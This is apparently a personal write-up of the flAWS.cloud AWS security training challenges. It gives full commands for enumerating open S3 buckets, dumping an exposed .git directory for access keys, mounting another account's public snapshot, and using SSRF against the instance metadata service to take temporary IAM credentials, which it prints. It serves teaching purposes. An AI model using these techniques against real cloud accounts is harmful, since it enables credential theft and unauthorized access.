flAWS.cloud Experience and Write-Up

FLAWS is not a CTF per se. There are no teams, no scoreboard, no score, and the hints will walk you through each step for every challenge if you choose to view them. FLAWS is a freely available series of challenges designed to teach its users about common mistakes and misconfigurations when using AWS. The challenges can be found at: http://flaws.cloud/

Here's my writeup for the six levels:

Level 1

This level is *buckets* of fun.  See if you can find the first sub-domain.

I began this level by enumerating buckets with cloud_enum, targeting the keyword "flaws.cloud," and I pressed Ctrl+C after I saw the "secret" html file to limit the number of requests to Amazon:

# cloud_enum -k flaws.cloud --disable-azure --disable-gcp
<snip>
[+] Checking for S3 buckets
    OPEN S3 BUCKET: http://flaws.cloud.s3.amazonaws.com/
      FILES:                                                                                                           
      ->http://flaws.cloud.s3.amazonaws.com/flaws.cloud
      ->http://flaws.cloud.s3.amazonaws.com/hint1.html
      ->http://flaws.cloud.s3.amazonaws.com/hint2.html
      ->http://flaws.cloud.s3.amazonaws.com/hint3.html
      ->http://flaws.cloud.s3.amazonaws.com/index.html
      ->http://flaws.cloud.s3.amazonaws.com/logo.png
      ->http://flaws.cloud.s3.amazonaws.com/robots.txt
      ->http://flaws.cloud.s3.amazonaws.com/secret-dd02c7c.html
    [!] Connection error on flaws.cloud.analytics.s3.amazonaws.com. Investigate if there are many of these.
^CThanks for playing!...

I figured that the "secret" html file was the target and used curl to see what it was. I like to put && echo at the end of my curl commands because, if the command runs successfully, echo adds a newline, which prevents that annoying thing bash does when your prompt ends up on the same line as the previous command's output.

# curl http://flaws.cloud.s3.amazonaws.com/secret-dd02c7c.html && echo

<snip>

<h1>Congrats! You found the secret file!</h1>
</center>

Level 2 is at <a href="http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud">http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud</a>

Level 2

The next level is fairly similar, with a slight twist.  You're going to need your own AWS account for this.  You just need the free tier.

Browsing to the URL for Level 2 loads the lesson for Level 1, with example cases and tips for avoiding the issue in that challenge, which is awesome. Kudos to Scott Piper (@0xdabbad00) for putting together such an informative resource for free.

Additionally, the main page for Level 2 presented the challenge (posted above) that needed to be solved in order to progress to Level 3. I had already configured the AWS CLI, and I know that the S3 service is a fantastic way to host static websites, so I assumed the URL was also the name of the S3 bucket that we would have to review:

# aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

2017-02-26 21:02:15      80751 everyone.png
2017-03-02 22:47:17       1433 hint1.html
2017-02-26 21:04:39       1035 hint2.html
2017-02-26 21:02:14       2786 index.html
2017-02-26 21:02:14         26 robots.txt
2017-02-26 21:02:15       1051 secret-e4443fc.html

# curl http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html && echo

<snip>

<h1>Congrats! You found the secret file!</h1>
</center>

Level 3 is at <a href="http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud">http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud</a>

Level 3

The next level is fairly similar, with a slight twist.  Time to find your first AWS key! I bet you'll find something that will let you list what other buckets are.

Starting with the same assumptions about how FLAWS was using S3 buckets, I began by reviewing the content with aws s3:

# aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud

                           PRE .git/
2017-02-26 19:14:33     123637 authenticated_users.png
2017-02-26 19:14:34       1552 hint1.html
2017-02-26 19:14:34       1426 hint2.html
2017-02-26 19:14:35       1247 hint3.html
2017-02-26 19:14:33       1035 hint4.html
2020-05-22 14:21:10       1861 index.html
2017-02-26 19:14:33         26 robots.txt

The .git directory is often a treasure trove of information. Having pillaged .git directories on web servers in other CTFs and on external engagements that I've conducted professionally, I knew that gitdumper from GitTools (https://github.com/internetwache/GitTools) would download all of the objects and commit history. Then, I could use the extractor.sh script, also from GitTools, to place all of the objects in a local directory that I could peruse:

# gitdumper.sh http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/ flaws/level3 

<snip>

# extractor.sh /root/flaws/level3/ flaws/level3/gitout 

<snip>

~/flaws/level3/gitout# tree
.
├── 0-f52ec03b227ea6094b04e43f475fb0126edb5a61
│   ├── access_keys.txt
<snip>

# cat 0-f52ec03b227ea6094b04e43f475fb0126edb5a61/access_keys.txt
access_key AKIAJ366LIPB4IJKT7SA
secret_access_key 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

# aws configure  

<snip> # Note: entered key material with no region set

# aws s3 ls

2017-02-12 16:31:07 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud
2017-05-29 12:34:53 config-bucket-975426262029
2017-02-12 15:03:24 flaws-logs
2017-02-04 22:40:07 flaws.cloud
2017-02-23 20:54:13 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
2017-02-26 13:15:44 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
2017-02-26 13:16:06 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
2017-02-26 14:44:51 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud
2017-02-26 14:47:58 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
2017-02-26 15:06:32 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud
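One thing I'd do differently next time (and a tip I repeat in the conclusion): keep found keys in a named profile instead of overwriting the default credentials. A rough sketch; the profile name flawsL3 is just an example:

# aws configure --profile flawsL3      # prompts for the key, secret, region, and output format
# aws --profile flawsL3 s3 ls          # any command can then be run as that profile

aws configure --profile writes a bracketed [flawsL3] section to ~/.aws/credentials rather than touching [default].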

Level 4

For the next level, you need to get access to the web page running on an EC2 at 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

It'll be useful to know that a snapshot was made of that EC2 shortly after nginx was setup on it.

One important concept concerning AWS resources is that of Regions. An AWS Region is a geographic location consisting of multiple Availability Zones (AZs). Regions are isolated from one another; the AZs within a Region are isolated from each other but interconnected.

All that to say, if you attempt to use "aws ec2" commands against a resource in region us-west-2, but you specified us-east-1, you are going to have a bad time.
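A way to sidestep whatever region aws configure has set is to pass --region explicitly on each call; a sketch (REGION-NAME is a placeholder for any of the names describe-regions returns):

# aws ec2 describe-regions --output text --query 'Regions[].RegionName'
# aws ec2 describe-snapshots --region REGION-NAME --filters Name=description,Values=*flaws*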

So the first stumbling block that I encountered was self-inflicted: when I ran aws configure, I set the region to us-east-1.

With that in mind, I used ec2 describe-snapshots to begin hunting down the snapshot: 

# aws ec2 describe-snapshots --filters Name=description,Values=*flaws*

{
    "Snapshots": [
        {
            "Description": "flaws4 volume copied",
            "Encrypted": false,
            "OwnerId": "206747113237",
            "Progress": "100%",
            "SnapshotId": "snap-07a9c50931c651cf8",
            "StartTime": "2020-03-02T16:34:10.260Z",
            "State": "completed",
            "VolumeId": "vol-ffffffff",
            "VolumeSize": 8
        }
    ]
}

If you read my 2020 HTH CTF - Cloud Challenges post, then you may recall that I have incurred charges while messing around with snapshots. An important thing to know about AWS is that uploading data is, generally speaking, free. Getting it back out and moving it around will have costs associated with it.

So what I wanted to do was validate that this snapshot was, in fact, without a doubt, the "right" one.
I knew I had the "right" credentials, but I had entered us-east-1 with the thought that I'd just go through each region until I found a snapshot. I was suspicious when my first attempt found one, so I knew I needed to check my answer.

To do that, I pinged the level 4 bucket:

# ping level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
PING level4-1156739cfb264ced6de514971a4bef68.flaws.cloud (52.218.144.79) 56(84) bytes of data.
64 bytes from s3-website-us-west-2.amazonaws.com (52.218.144.79): icmp_seq=1 ttl=28 time=95.0 ms

Ah Ha! I was in the wrong region. 
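The website endpoint in the ping reply (s3-website-us-west-2) is what gives the region away. If the caller is permitted to make the call, s3api get-bucket-location is another option; a sketch:

# aws s3api get-bucket-location --bucket level4-1156739cfb264ced6de514971a4bef68.flaws.cloud

It returns the bucket's LocationConstraint (the region name, or null for us-east-1).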

For consistency, I updated the region with aws configure and issued the command again:

# aws ec2 describe-snapshots --filters Name=description,Values=*flaws*
{
    "Snapshots": []
}

Now, with the correct region set for the "stolen" credentials I was using, there were no results. This made me think about what else I could search for. Another bit of information we can filter results on is the OwnerId. If I could run a "whoami" equivalent command in AWS, I could verify whether the snapshot owned by 206747113237 actually belonged to the account behind the credentials I was using.

A quick Google search for "aws whoami" returned the documentation for get-caller-identity under the Security Token Service (sts) command.

# aws sts get-caller-identity
{
    "UserId": "AIDAJQ3H5DC3LEG2BKSLC",
    "Account": "975426262029",
    "Arn": "arn:aws:iam::975426262029:user/backup"
}

It seemed safe to assume that the value of the "Account" field, which also appears in the Amazon Resource Name (ARN), should have matched the OwnerId of the snapshot returned in us-east-1, which it clearly did not.

Having excluded the result from us-east-1, I then leveraged the ec2 command once again, but this time I filtered the results by owner-id:

# aws ec2 describe-snapshots --owner-id 975426262029
{
    "Snapshots": [
        {
            "Description": "",
            "Encrypted": false,
            "OwnerId": "975426262029",
            "Progress": "100%",
            "SnapshotId": "snap-0b49342abd1bdcb89",
            "StartTime": "2017-02-28T01:35:12.000Z",
            "State": "completed",
            "VolumeId": "vol-04f1c039bc13ea950",
            "VolumeSize": 8,
            "Tags": [
                {
                    "Key": "Name",
                    "Value": "flaws backup 2017.02.27"
                }
            ]
        }
    ]
}

As seen in the output above, the empty Description field explains why the description filter returned no results in the correct region.

The goal now was to create a volume from the snapshot in the AWS account that I actually own and mount it on an instance. So, I reset my credentials to my own and issued the following command:

# aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

When you specify the AZ, you're actually specifying the destination AZ. This wasn't obvious to me, so I read up on the create-volume command and began experimenting. What I learned was that you can specify any AZ so long as it is in the same region as the snapshot you are copying.
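Before doing anything in the console, I could have confirmed that the volume landed in my account with describe-volumes filtered on the snapshot id; a sketch:

# aws ec2 describe-volumes --region us-west-2 --filters Name=snapshot-id,Values=snap-0b49342abd1bdcb89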

After creating the volume, I logged into the management console, changed my region to us-west-2, opened up the EC2 service, and navigated to "Volumes" under the Elastic Block Store menu.

At this point I still needed an instance, so I went back and created a free-tier Ubuntu instance, applied a security group rule to only allow my public IP to SSH to it, created a new key pair, and connected to it once the new instance was ready.

Back in the dashboard, I selected the new volume and attached it to the newly spun-up instance. AWS prompted me for the running instance (but auto-populated it), asked for a /dev/sdX-style device name, and warned me that it may be renamed to something like xvdX on the instance.
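The same attachment can be done from the CLI if you prefer; a sketch with placeholder IDs (substitute the new volume id and your instance id):

# aws ec2 attach-volume --region us-west-2 --volume-id vol-XXXXXXXX --instance-id i-XXXXXXXX --device /dev/sdf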

After attaching the volume, I issued the following commands:

ubuntu@ip-172-31-46-167:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
loop0     7:0    0 97.8M  1 loop /snap/core/10185
loop1     7:1    0 55.3M  1 loop /snap/core18/1885
loop2     7:2    0 70.6M  1 loop /snap/lxd/16922
loop3     7:3    0 28.1M  1 loop /snap/amazon-ssm-agent/2012
xvda    202:0    0    8G  0 disk 
└─xvda1 202:1    0    8G  0 part /

ubuntu@ip-172-31-46-167:~$ sudo file -s /dev/xvda1
/dev/xvda1: Linux rev 1.0 ext4 filesystem data, UUID=175c087c-0fe9-4d62-a38d-e5f8a66a5851, volume name "cloudimg-rootfs" (needs journal recovery) (extents) (64bit) (large files) (huge files)

ubuntu@ip-172-31-46-167:~$ sudo mount /dev/xvda1 /mnt

ubuntu@ip-172-31-46-167:/$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
loop0     7:0    0 97.8M  1 loop /snap/core/10185
loop1     7:1    0 55.3M  1 loop /snap/core18/1885
loop2     7:2    0 70.6M  1 loop /snap/lxd/16922
loop3     7:3    0 28.1M  1 loop /snap/amazon-ssm-agent/2012
xvda    202:0    0    8G  0 disk 
└─xvda1 202:1    0    8G  0 part /mnt
xvdf    202:80   0    8G  0 disk 
└─xvdf1 202:81   0    8G  0 part 

For some reason, at this point I stopped logging commands. I believe what happened was that I mounted the wrong device, unmounted it, and at some point decided that comparing the md5sums of the two passwd files was a good way to verify that I had mounted the snapshot's volume rather than the instance's own root filesystem:

ubuntu@ip-172-31-46-167:/$ sudo mount /dev/xvdf1 /mnt

ubuntu@ip-172-31-46-167:/$ cd /mnt

ubuntu@ip-172-31-46-167:/mnt$ md5sum etc/passwd
2eb872cf4018f117b3c4fa1dedb6844a  etc/passwd

ubuntu@ip-172-31-46-167:/mnt$ md5sum /etc/passwd
3252d5691e699e7193e8164c459adb79  /etc/passwd

ubuntu@ip-172-31-46-167:/mnt$ ls var/
backups/ cache/   crash/   lib/     local/   lock/    log/     mail/    opt/     run/     snap/    spool/   tmp/     www/     

ubuntu@ip-172-31-46-167:/mnt$ ls var/www/html/
index.html  robots.txt  

ubuntu@ip-172-31-46-167:/mnt$ cat var/www/html/index.html 

<snip>

Good work getting in.  This level is described at <a href="http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/">http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/</a>

Level 5

This EC2 has a simple HTTP only proxy on it. Here are some examples of its usage:


http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/flaws.cloud/
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/summitroute.com/blog/feed.xml
http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/neverssl.com/

See if you can use this proxy to figure out how to list the contents of the level6 bucket at level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud that has a hidden directory in it.

I began this one by trying to reach local files through the proxy, targeting localhost and 127.0.0.1, but I was pretty stumped about where to go, so I took the first hint:

On cloud services, including AWS, the IP 169.254.169.254 is magical.  It's the metadata service. There is an RFC on it (RFC-3927), but you should read the AWS specific docs on it here.

Need another hint?  Go to Hint 2 

Ah yes, now I recall seeing a few references to various 169 addresses while working on the HTH cloud challenges.  After some reading about the metadata service, I learned that you can obtain credentials from it. So, I leveraged the proxy feature for the level to browse to: 169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance/

First, I copied those credentials into the .aws/credentials file and attempted to use s3 to list or copy the contents of the level6 bucket, but I received an access denied error:

# aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud 

An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied

I started exploring the metadata service by issuing curl commands through the proxy to browse around the directory structure, and eventually I found a different set of credentials under the iam path rather than the ec2 path.
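I didn't capture every intermediate request, but the walk looks roughly like this (the paths follow the standard IMDSv1 layout, and the proxy prefix is the same as in the challenge examples):

# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/ && echo
# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/ && echo

The first request lists the metadata categories (including iam/), and the second returns the instance profile's role name, flaws, which is what gets appended in the request below: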

# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws &&echo

{
  "Code" : "Success",
  "LastUpdated" : "2021-02-23T17:14:40Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA6GG7PSQG3OIG3VV2",
  "SecretAccessKey" : "/CEI0RR92CotdDkhIaUFwpVpzyCwLnDGe77jKEMH",
  "Token" : "IQoJb3JpZ2luX2VjEOn//////////wEaCXVzLXdlc3QtMiJIMEYCIQDaHfmt4atnHXcHII3eUgshtWXA6ZdNzhiauXPI6fUYtAIhAIgWPOmVDrwkXaFNMukfRihlkw7x4tOarsY2mIDlIg2jKr0DCPL//////////wEQARoMOTc1NDI2MjYyMDI5IgxVul6YNRR4NfpjGdAqkQMTSizbBfXjo8o3JZDZPTX/AOUHx9fojwM4/C1Wuij92QbVAbKUElcS1iwTXgvtseM+Oxj0XJnOvlYeoaHeinoqNuLX02LZ95AO8yz6x9K7hV+2aXw7Cf/OCOTI4+TN59vxwKegW7T9HZF9osDKaSRzAxzurIod97m4B6C54thi9+BX7TwYFDPiQV2Gjvx3XthA461pGIIaMHqlI81yy0S8ChbAYlZz2pVRHEBTe5Cv27BJs+d4QUYHjULjDymieigo1QdQtVYPpjtYd52OUbc0BJzmHf2s8glAUQcZMcWBiB8Z05cbHd2qqVLOxxbXH5Z+6j+hKoKZxL/Y41oSvMfQvDb9J6Tn8xHhwrBcViTUGKBlQMMateKkCNTM1w1GhiZ6mBoWY2uxX6LC7yjXanvng8kBX0b1k0oND8yFeschAMX4fX7nUaBaEv3EkUVt/aB+JpDpzXrjCtNPFnwZpQtcXWflb3FZ+0EXSs2BLTaunXN2FiCc5nj0Nuv//aljeCjRIp2kqWQTZNsYsfgLY+Zj8DCj8NSBBjrqART2P693V/8VnIuvXwlFtQEtpRwJ+pVJGqNOCHnCqwd4v6faCho7+Wmhv5s8GDQn/BUnsRHWap4EPFjFtUbDkrxuQ87NLE/mivSJjdYauS7jBrW4HnDKq41StbaoulLI45zV8QHLyJmxItVxkkkrgsz0TNz+ckf8/YCkeyMNcs11SBNA65zjnRKFkSgbdao22K55+1xYkxky/boBbaljvJi62H4/fUyJ1jh3T4qCPUtZCzmjiGF9ZezoMn/2w0DGgi42DUe8ur95bKo88nBq1oLG6mMaKpJKx+kEgF+sjVH20azutZIFK6VrkA==",
  "Expiration" : "2021-02-23T23:20:42Z"
}

# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance/ &&echo

{
  "Code" : "Success",
  "LastUpdated" : "2021-02-23T17:15:17Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA6GG7PSQG2KLKDVG4",
  "SecretAccessKey" : "YLgKg0/OO4UK+28W/inrgPFt7XA2iy4gk3UQpfRK",
  "Token" : "IQoJb3JpZ2luX2VjEOn//////////wEaCXVzLXdlc3QtMiJIMEYCIQCkZHKULDojTKvFGrM2rJZxRUz8yzeIqRrCM4HwaVmErQIhAKGX9PjshxWr8KKC1a3ozzf6pujt1Q6MqOX958HbZ2X7KsgDCPL//////////wEQARoMOTc1NDI2MjYyMDI5Igzcl4xZE1x6cW/ABgIqnANROsvWZZcEjecVwcXD8tnAIhH6r07P4QwkavacNvQQyQQ0ZcIDShjiBmKuabZYpHIwjCE1vFjpmRY5cAwpKgqzaAo9+rbX/rz2o3efaIg7AytZdmL7jr62MkCB6nRZN02jNpld/cqLj+PVk9rJ8gTSGlHsIc2ql16ZhI/E0+igbIMyVhP0e1YgnWfVCDycgHCRcXZg6yLdqFktoFIVcP8VMxbDyH0yfRZQQHStuKLAc2mL85m/rgxsyhVFrYudF8/mxvHcidy7nLaYhENu08QzWJGiKKFsw9Zs0EwWaDO/x42JwunPbh18SPhbJLGFBiPS4GT2SnzpaIWn7bpSWJWWl9KJH3OSipQacYTqaYuTA6UW1f3VDdng0tCTrJbheDoHMce1wGYU+AUW0HsheA51Ie9bATDAc95DlUxe7s2HQD4NPAoo8dg/d2XTqsAQ0foHYIHdqYo9hvpYf+ZWidQrUdC+CuAO2SYFpfwS7RIszdjVl4rXZ14aZItuFPX7EIMSW+Kiqsf1kKrSB35bAKYdX6LTTb37Bat3ANQhMKPw1IEGOuYB+QqBl1QKwI/1hzrdOYKis30pO3j6KUdA60FJ0AM863h8+wVndEbfw9jBDcBeKAAW6QywiDAGPjEMvMmX1fdxflMGndTOk9bHvu/WLtKeQKTguBdQ/STquE7qsXMRkFiFqZfGUO/DhT29u+kIRzqQF6n4P01aR+4g2mFJAcpYWd8spUF1z5OVoTGGvMBmP6kALgTLvkXvev3SRC3n4aUNPzdFEx1XaKpbMvePCZ7odWpO0+b28THVGo7DsXTrL0SQkHl9VIqgh+3ldJpem/xBkrk/7BkCIJa4EP0fOk5KjoH7tzuaRfw=",
  "Expiration" : "2021-02-23T23:20:17Z"
}
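Worth noting: these are temporary STS credentials, so the profile in ~/.aws/credentials needs all three values, including the session token. A sketch; the profile name flaws is just an example, and the placeholders are the values from the response above:

[flaws]
aws_access_key_id = <AccessKeyId from the response above>
aws_secret_access_key = <SecretAccessKey from the response above>
aws_session_token = <the full Token value from the response above>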

After updating the credentials, I was then able to use s3 to list and copy the contents of the bucket:

# aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud 

                           PRE ddcc78ff/

2017-02-26 21:11:07        871 index.html

# aws s3 cp s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/index.html .
download: s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/index.html to ./index.html

# cat index.html 

<snip>
<h1>Access Denied</h1>
</center>

Level 6 is hosted in a sub-directory, but to figure out that directory, you need to play level 5 properly.

<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>

# aws s3 cp s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ . --recursive
download: s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/hint1.html to ddcc78ff/hint1.html
download: s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/hint2.html to ddcc78ff/hint2.html
download: s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/index.html to ddcc78ff/index.html
download: s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/index.html to ./index.html

# cat ddcc78ff/index.html 
<snip>
<h1>Level 6</h1>
For this final challenge, you're getting a user access key that has the SecurityAudit policy attached to it.  See what else it can do and what else you might find in this AWS account.

<p>Access key ID: AKIAJFQ6E7BY57Q3OBGA<br>
Secret: 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<br> 


<p>Need a hint?  Go to  <a href="./hint1.html">Hint 1</a>

Level 6

For this final challenge, you're getting a user access key that has the SecurityAudit policy attached to it.  See what else it can do and what else you might find in this AWS account.

Access key ID: AKIAJFQ6E7BY57Q3OBGA
Secret: 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

For this one, I decided to start by using weirdAAL to help enumerate what this account can do.

More information on installing it can be found in the 2020 HTH Cloud Challenges post.

# python3 ./weirdAAL.py -m recon_all -t flawsL6

<snip>

Printing Users
[    {    'Arn': 'arn:aws:iam::975426262029:user/backup',
          'CreateDate': datetime.datetime(2017, 2, 12, 20, 58, 26, tzinfo=tzutc()),
          'Path': '/',
          'UserId': 'AIDAJQ3H5DC3LEG2BKSLC',
          'UserName': 'backup'},
     {    'Arn': 'arn:aws:iam::975426262029:user/Level6',
          'CreateDate': datetime.datetime(2017, 2, 26, 23, 11, 16, tzinfo=tzutc()),
          'Path': '/',
          'UserId': 'AIDAIRMDOSCWGLCDWOG6A',
          'UserName': 'Level6'}]
<snip>

The amount of information that came back was a bit intimidating. I looked for information relating to policies, but as far as I could see it just wasn't in there. I started poking at some database and Lambda actions (one was named Level6, which seemed telling), but honestly I couldn't figure out where to go with that information, so I decided to stay focused on the SecurityAudit policy that was called out in the challenge. Aside from learning the username, I didn't get very much out of this.

Next, I tried leveraging enumerate-iam.py to see if I could learn more about the policies:

# python3 enumerate-iam.py --access-key AKIAJFQ6E7BY57Q3OBGA --secret-key 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 --region us-west-2 &> l6.out

<snip>

I used less to review the output file and searched for SecurityAudit; here's the section I found:

            "Path": "/",
            "UserName": "Level6",
            "UserId": "AIDAIRMDOSCWGLCDWOG6A",
            "Arn": "arn:aws:iam::975426262029:user/Level6",
            "CreateDate": "2017-02-26T23:11:16+00:00",
            "GroupList": [],
            "AttachedManagedPolicies": [
                {
                    "PolicyName": "list_apigateways",
                    "PolicyArn": "arn:aws:iam::975426262029:policy/list_apigateways"
                },
                {
                    "PolicyName": "MySecurityAudit",
                    "PolicyArn": "arn:aws:iam::975426262029:policy/MySecurityAudit"
                }

Okay, now we're getting somewhere. I went through the occurrences of SecurityAudit in the file and found a list of allowed actions. With respect to S3, all it could do was list buckets.

I was fairly stuck here, so I reviewed hint 1, which instructed me to review what the policy allows by determining the version ID for the list_apigateways policy.
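The hint's approach boils down to pulling the policy's default version and reading its document. A rough sketch using the iam commands and the policy ARN from the enumerate-iam output above (the v1 version id is just an example; list-policy-versions shows the real one):

# aws iam list-policy-versions --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
# aws iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v1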

Instead of running the commands listed in the hint, I went back to the enumerate-iam output file and reviewed what the tool reported about the list_apigateways policy, where I found the information that the hint had instructed me to look for:

                    "Document": {
                        "Version": "2012-10-17",
                        "Statement": [
                            {
                                "Action": [
                                    "apigateway:GET"
                                ],
                                "Effect": "Allow",
                                "Resource": "arn:aws:apigateway:us-west-2::/restapis/*"
                            }
                        ]
                    }

Hint 1 leaves us here. 

I read up on the apigateway aws cli commands and saw that, in order to use get-rest-api, I would need a valid rest-api-id.

Reviewing the enumerate-iam output again, I first assumed the id would be the "pusp" value I saw here:

"Resource": "arn:aws:apigateway:us-west-2::/restapis/puspzvwgb6/stages"

That was a bad assumption. Again, after reviewing a lot of documentation and tool output, I felt like I had hit a wall that I just couldn't surmount. I am a bit sad to report, and not too proud to admit, that the Level 6 challenge got the best of me and taught me some valuable lessons about how all these services can interact with each other and, of course, what that means for your security posture.

The second hint confirmed I was on the right path about getting the rest-api-id and showed that, with the SecurityAudit policy, it is possible to identify it with the following command:

# aws --region us-west-2 lambda get-policy --function-name Level6
{
    "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}",
    "RevisionId": "98033dfd-defa-41a8-b820-1f20add9c77b"

Do you see it? It's: s33ppypa75

Even though the hint gave me the right commands needed to solve this challenge, I wanted to continue my initial thought process, which confirmed that I still had some more reading to do on the apigateway commands.
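Following that thread, the command the apigateway reading eventually leads to is get-stages against the rest-api-id pulled from the Lambda policy; a sketch:

# aws --region us-west-2 apigateway get-stages --rest-api-id s33ppypa75

The response lists a stage named Prod.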

The end goal was to identify the stage name so you could infer the URL: browse to the API gateway (https://s33ppypa75.execute-api.us-west-2.amazonaws.com/) and pair that with the stage name and the Lambda function name (/Prod/level6). A keen eye will note the lowercase "l" in level6, as specified in the AWS:SourceArn.

Browsing to that link gives you the final URI for the content hosted on "theend" S3 bucket.

The End

Lesson learned

It is common to give people and entities read-only permissions such as the SecurityAudit policy. The ability to read your own and others' IAM policies can really help an attacker figure out what exists in your environment and look for weaknesses and mistakes.
Avoiding this mistake

Don't hand out any permissions liberally, even permissions that only let you read meta-data or know what your permissions are.

To be continued ;)  

Conclusion

What a fantastic resource! It confirmed that I know most of what I thought I knew, it challenged me to go a little further in order to figure some of the other challenges out, and it humbled me by showing just how complicated and esoteric the cloud can be when you don't specialize in a single platform or you've spent too much time trying to abuse Windows environments.

There were a few things that I picked up about AWS while running through these challenges that I'd like to share here in a quick bullet list:

  • ping an S3 bucket to quickly check which region you are targeting. 
  • aws configure --profile NAME for credential management.
    • create profiles by using brackets in .aws/credentials
  • aws --profile NAME sts get-caller-identity to validate who you are working as. 
  • For loops for running commands in and against all regions (expanded with comments below).
    • for R in $(aws ec2 describe-regions --output text --query 'Regions[].[RegionName]') ; do echo "$R:"; aws ec2 describe-instances --output json --region $R | jq -r '.[]';echo;done
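
Spelled out with comments, that region loop reads like this (same behavior, just easier to follow):

for R in $(aws ec2 describe-regions --output text --query 'Regions[].[RegionName]'); do
    echo "$R:"                                                           # label the region
    aws ec2 describe-instances --output json --region $R | jq -r '.[]'   # dump any instances found there
    echo                                                                 # blank line between regions
done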

Thanks for reading!

@strupo_

Find us on twitter: @teamWTG

